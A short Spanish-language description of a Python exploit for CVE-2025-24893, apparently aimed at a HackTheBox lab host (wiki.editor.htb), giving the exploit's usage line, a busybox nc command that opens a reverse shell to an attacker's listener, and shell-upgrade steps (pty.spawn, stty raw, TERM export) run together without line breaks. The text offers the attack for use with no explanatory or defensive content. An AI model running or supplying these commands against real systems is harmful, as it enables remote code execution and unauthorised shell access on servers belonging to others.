
Exploit en Python para CVE-2025-24893 que ejecuta una reverse shell en aplicaciones web vulnerables, con instrucciones de mejora de shell.
python3 CVE-2025-24893.py -u http://wiki.editor.htb/ -c "busybox nc <listener ip> <listener port> -e /bin/bash"
python3 -c 'import pty; pty.spawn("/bin/bash")'ctrl + zstty sizestty raw -echo; fgstty rows x columns yexport TERM=xterm